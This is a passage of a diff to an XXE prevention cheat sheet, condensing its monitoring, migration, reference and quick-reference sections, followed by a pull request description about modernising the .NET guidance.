+- Log parse-time exceptions
+- Alert on unexpected outbound requests
+- Preserve logs and payloads for suspected XXE
 
 ---
+## 11. Migration notes
 
-## 11. Migration notes (removing legacy content)
-
-- Remove references to deprecated projects (e.g., `dotnet_security_unit_testing`) from the cheat sheet.
-
-- If unsure about platform-specific legacy content (e.g., iOS < 7 guidance), mark as deprecated and request a follow-up PR from platform experts.
-
-- Replace any sample code that targets obsolete runtimes (e.g., .NET 4.5) with modern examples, and add notes where behavior differs across versions.
+- Remove references to deprecated projects
+- Mark iOS < 7 guidance as deprecated
+- Update examples to modern runtimes
 
 ---
-
 ## 12. References & further reading
 
-- OWASP: XML External Entity (XXE) Prevention.  
-
-- Timothy Morgan: "XML Schema, DTD, and Entity Attacks" (2014).  
-
-- DefusedXML Python docs.  
-
-- Microsoft: XML security guidance (.NET).  
-
-- libxml2 and Xerces documentation.
-
-(Include full links in the actual repo file as required.)
+- OWASP: XML External Entity (XXE) Prevention
+- DefusedXML Python docs
+- Microsoft: XML security guidance (.NET)
+- libxml2 and Xerces documentation
 
 ---
-
 ## 13. Appendix: Quick reference (one-page)
 
 **Always do these three things for untrusted XML:**
-
-1. Disable DTDs / DOCTYPEs.  
-
-2. Disable external entity resolution (set resolvers to null/no-op).  
-
-3. Use streaming secure parsers and add size/resource limits.
-
----
-
+1. Disable DTDs / DOCTYPEs
+2. Disable external entity resolution
+3. Use streaming secure parsers and add size/resource limits


### PR DESCRIPTION
This PR updates the .NET section of the XML External Entity (XXE) Prevention Cheat Sheet to modern versions (e.g., .NET 6/7) and removes outdated references such as dotnet_security_unit_testing.  

Additionally, the PR marks iOS 6 content as deprecated and adds a note reminding developers to always check the latest secure defaults for any framework or library.  

Fixes/Addresses: #1354
